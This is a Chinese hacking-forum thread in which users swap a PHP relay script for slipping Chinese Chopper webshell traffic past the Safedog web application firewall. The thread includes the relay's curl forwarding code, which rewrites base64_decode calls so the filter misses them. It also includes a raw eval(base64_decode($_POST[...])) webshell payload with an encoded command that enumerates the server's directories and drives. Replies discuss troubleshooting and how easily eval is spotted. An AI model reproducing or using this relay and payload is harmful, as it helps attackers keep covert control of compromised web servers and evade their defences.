还是一句话过狗，php中转

beizidream

看到大牛们各种虐杀小狗，各种羡慕嫉妒恨， 于是自己弄个了简单的，
将菜刀里面的关键字base64_encode用post中转

一句话

生成中转

手动提交测试，还是妥妥的

放到菜刀，里面，结果。。。。


抓包调试，结果，结果，没有抓到，直接连一句话能抓到，中转脚本没有{:soso_e153:}

核心代码

[AppleScript] 纯文本查看 复制代码

private function SendUrl($encodResult){
        if (strpos($this->config['url'],'?') === false) $url = $this->config['url'].'?124213=base64_decode';
        else $url = $this->config['url'].'&124213=base64_decode';
    	$postData = $_POST;
    	$data = str_replace("base64_decode(", '$_GET[124213](', $postData);
        $ch =curl_init($url);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0');
        $output = curl_exec($ch);
        curl_close($ch);
        echo $output;
    	
    }

   
大神给点意见吧

buxuan

需要开启   CURL

beizidream

buxuan 发表于 2014-5-30 09:08
需要开启   CURL

肯定开始了的，要不手动测试也通不过啊
手动测试中转完全正常

beizidream

来个php大年吧 ， 简单的post参数中转没问题，参数像下面这个就完全没中转了

123=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7

用到这个curl完全没有操作了

beizidream

beizidream

问题解决了 一个人玩得好happy

a13775647904

beizidream 发表于 2014-5-30 15:58
问题解决了 一个人玩得好happy

为何不参照下小影的中转呢

blck

hack.me 中转配置呢？

buxuan

beizidream 发表于 2014-5-30 12:51
来个php大年吧 ， 简单的post参数中转没问题，参数像下面这个就完全没中转了

123=@eval(base64_decode($_P ...

过狗可以，可是用来藏shell就不行了。。。
关键词 eval 直接定位--
  眼睛一看这样的代码就是高危代码..
也只能用来过狗了

beizidream

blck 发表于 2014-5-31 23:46
hack.me 中转配置呢？

hack.me 是我本地 127.0.0.1